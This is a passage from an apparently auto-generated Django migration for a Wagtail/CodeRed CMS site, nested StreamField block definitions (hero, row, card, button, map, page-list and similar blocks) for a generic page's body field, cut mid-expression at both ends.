wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], blank=True, null=True),
),
migrations.AlterField(
model_name='genericpage',
name='body',
field=wagtail.core.fields.StreamField([('hero', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(default=True, label='Full width', required=False)), ('is_parallax', wagtail.core.blocks.BooleanBlock(help_text='Background images scroll slower than foreground images, creating an illusion of depth.', label='Parallax Effect', required=False)), ('background_image', wagtail.images.blocks.ImageChooserBlock(required=False)), ('tile_image', wagtail.core.blocks.BooleanBlock(default=False, label='Tile background image', required=False)), ('background_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. #ff0011)', label='Background color', max_length=255, required=False)), ('foreground_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. #ff0011)', label='Text color', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', 